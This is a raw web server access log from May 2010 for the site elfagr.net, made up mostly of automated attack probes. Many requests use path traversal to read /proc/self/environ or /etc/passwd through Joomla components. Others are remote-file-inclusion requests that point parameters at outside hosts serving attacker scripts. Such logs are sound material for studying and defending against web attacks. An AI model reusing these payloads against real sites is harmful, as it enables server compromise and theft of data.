178.32.3.34 - - [06/May/2010:10:10:33 -0700] "GET /*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [06/May/2010:10:10:25 -0700] "GET /logs/*.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:11:34 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
95.108.150.235 - - [06/May/2010:10:12:51 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.elfagr.net"
95.108.150.235 - - [06/May/2010:10:12:43 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Yandex/1.01.001 (compatible; Win16; H)" "elfagr.net"
95.108.150.235 - - [06/May/2010:10:12:44 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.elfagr.net"
95.108.150.235 - - [06/May/2010:10:12:45 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "elfagr.net"
95.108.150.235 - - [06/May/2010:10:12:46 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.elfagr.net"
95.108.150.235 - - [06/May/2010:10:12:47 -0700] "GET / HTTP/1.1" 200 1465 "-" "Yandex/1.01.001 (compatible; Win16; H)" "elfagr.net"
74.86.204.19 - - [06/May/2010:10:13:26 -0700] "GET /logs/access.log//index.php?option=com_joomlalib&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
74.86.204.19 - - [06/May/2010:10:13:27 -0700] "GET /index.php?option=com_joomlalib&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
74.86.204.19 - - [06/May/2010:10:13:18 -0700] "GET /logs//index.php?option=com_joomlalib&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.833" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:13:52 -0700] "GET /logs/access.log/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:13:44 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:13:53 -0700] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:14:41 -0700] "GET /logs/access.log/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:14:41 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:14:33 -0700] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
67.195.113.247 - - [06/May/2010:10:22:49 -0700] "GET /logs/scripts.log HTTP/1.0" 200 21320 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
91.121.25.16 - - [06/May/2010:10:30:59 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:32:00 -0700] "GET /logs/access.log/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:32:00 -0700] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:31:52 -0700] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:34:39 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:36:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
174.133.197.114 - - [06/May/2010:10:36:48 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:10:36:50 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
62.140.247.10 - - [06/May/2010:10:37:09 -0700] "GET /logs/include/admin.lib.inc.php?site_path=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:10:37:09 -0700] "GET /include/admin.lib.inc.php?site_path=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:10:37:09 -0700] "GET /logs/access.log%20%20/include/admin.lib.inc.php?site_path=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:10:37:10 -0700] "GET /logs/include/admin.lib.inc.php?site_path=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:10:37:10 -0700] "GET /include/admin.lib.inc.php?site_path=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:10:37:18 -0700] "GET /logs/access.log%20%20/include/admin.lib.inc.php?site_path=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:41:55 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:41:55 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:41:55 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
174.133.197.114 - - [06/May/2010:10:46:38 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:10:46:38 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:10:46:38 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:10:46:38 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:10:46:38 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
174.133.197.114 - - [06/May/2010:10:46:47 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:56:14 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:56:06 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.25.16 - - [06/May/2010:10:56:06 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
222.122.52.80 - - [06/May/2010:10:59:30 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:10:59:39 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:10:59:30 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:10:59:52 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:00:00 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:10:59:52 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:10:59:53 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:10:59:53 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:10:59:53 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
67.195.113.247 - - [06/May/2010:10:59:54 -0700] "GET /logs/access_090924.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
114.108.151.149 - - [06/May/2010:11:00:28 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:11:00:29 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:11:00:39 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:11:00:51 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:01:58 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:01:50 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:01:50 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
114.108.151.149 - - [06/May/2010:11:01:56 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:11:03:39 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:11:05:18 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:11:05:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:11:05:29 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
74.54.78.146 - - [06/May/2010:11:06:57 -0700] "GET /?_PHPLIB[libdir]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.805" "elfagr.net"
111.89.128.186 - - [06/May/2010:11:13:26 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
111.89.128.186 - - [06/May/2010:11:13:35 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
83.69.115.198 - - [06/May/2010:11:14:04 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
83.69.115.198 - - [06/May/2010:11:14:07 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
114.108.151.149 - - [06/May/2010:11:14:40 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:11:14:41 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [06/May/2010:11:14:42 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
62.140.247.10 - - [06/May/2010:11:22:12 -0700] "GET /logs/access.log/include/admin.lib.inc.php?site_path=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:11:23:58 -0700] "GET /logs/access.log/include/admin.lib.inc.php?site_path=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
83.69.115.198 - - [06/May/2010:11:24:20 -0700] "GET /logs/access.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
83.69.115.198 - - [06/May/2010:11:24:15 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
83.69.115.198 - - [06/May/2010:11:24:23 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
83.69.115.198 - - [06/May/2010:11:24:38 -0700] "GET /logs/access.log//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
83.69.115.198 - - [06/May/2010:11:24:38 -0700] "GET /index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
83.69.115.198 - - [06/May/2010:11:24:39 -0700] "GET /logs//index.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
93.158.149.32 - - [06/May/2010:11:35:23 -0700] "GET /logs/access_100304.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
222.122.52.80 - - [06/May/2010:11:42:17 -0700] "GET /logs//common/db.php?commonpath=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:42:25 -0700] "GET /common/db.php?commonpath=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:42:25 -0700] "GET /logs/access.log%20%20//common/db.php?commonpath=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:42:21 -0700] "GET /logs//common/db.php?commonpath=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:42:21 -0700] "GET /common/db.php?commonpath=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:42:30 -0700] "GET /logs/access.log%20%20//common/db.php?commonpath=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:42:22 -0700] "GET /common/db.php?commonpath=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:42:22 -0700] "GET /logs//common/db.php?commonpath=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:42:23 -0700] "GET /logs/access.log%20%20//common/db.php?commonpath=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:46:00 -0700] "GET /common/db.php?commonpath=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:46:09 -0700] "GET /logs//common/db.php?commonpath=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:46:00 -0700] "GET /logs/access.log%20%20//common/db.php?commonpath=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:54:26 -0700] "GET /errors.php?error=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:54:17 -0700] "GET /logs/errors.php?error=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:54:17 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:54:25 -0700] "GET /errors.php?error=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:54:34 -0700] "GET /logs/errors.php?error=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:54:26 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:54:46 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:54:46 -0700] "GET /logs/errors.php?error=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:54:38 -0700] "GET /errors.php?error=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:56:52 -0700] "GET /logs/access.log%20%20/errors.php?error=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:57:00 -0700] "GET /errors.php?error=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
222.122.52.80 - - [06/May/2010:11:56:52 -0700] "GET /logs/errors.php?error=http://www.dislessiainrete.org/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
211.255.23.41 - - [06/May/2010:12:07:12 -0700] "GET /logs/access.log/?reflect_base=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
211.255.23.41 - - [06/May/2010:12:07:12 -0700] "GET /logs/?reflect_base=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 200 5085 "-" "Mozilla/5.0" "elfagr.net"
211.255.23.41 - - [06/May/2010:12:07:21 -0700] "GET /?reflect_base=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 200 1465 "-" "Mozilla/5.0" "elfagr.net"
64.251.10.117 - - [06/May/2010:12:15:32 -0700] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.834" "elfagr.net"
207.46.195.240 - - [06/May/2010:12:17:27 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.elfagr.net"
207.46.195.240 - - [06/May/2010:12:18:27 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.elfagr.net"
64.251.10.117 - - [06/May/2010:12:24:37 -0700] "GET /logs/access.log/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [06/May/2010:12:24:46 -0700] "GET /?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [06/May/2010:12:24:46 -0700] "GET /logs/?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "libwww-perl/5.834" "elfagr.net"
69.90.47.83 - - [06/May/2010:12:25:00 -0700] "GET /logs/access_091210.log////phphtml.php?htmlclass_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
69.90.47.83 - - [06/May/2010:12:24:52 -0700] "GET ///phphtml.php?htmlclass_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
69.90.47.83 - - [06/May/2010:12:24:52 -0700] "GET /logs////phphtml.php?htmlclass_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
64.251.10.117 - - [06/May/2010:12:25:19 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [06/May/2010:12:25:34 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
69.90.47.83 - - [06/May/2010:12:26:15 -0700] "GET /logs/access_100408.log////phphtml.php?htmlclass_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
217.73.239.8 - - [06/May/2010:12:33:15 -0700] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
64.251.10.117 - - [06/May/2010:12:36:42 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [06/May/2010:12:36:42 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [06/May/2010:12:36:51 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [06/May/2010:12:36:55 -0700] "GET /logs/access.log/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [06/May/2010:12:36:46 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [06/May/2010:12:36:46 -0700] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
93.158.149.32 - - [06/May/2010:12:39:01 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
217.73.239.8 - - [06/May/2010:12:40:34 -0700] "GET /logs/access.log/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
217.73.239.8 - - [06/May/2010:12:40:35 -0700] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
217.73.239.8 - - [06/May/2010:12:40:35 -0700] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.807" "elfagr.net"
83.217.224.50 - - [06/May/2010:12:57:38 -0700] "GET /logs/access_091126.log///administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.yajiada88.com/hid/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
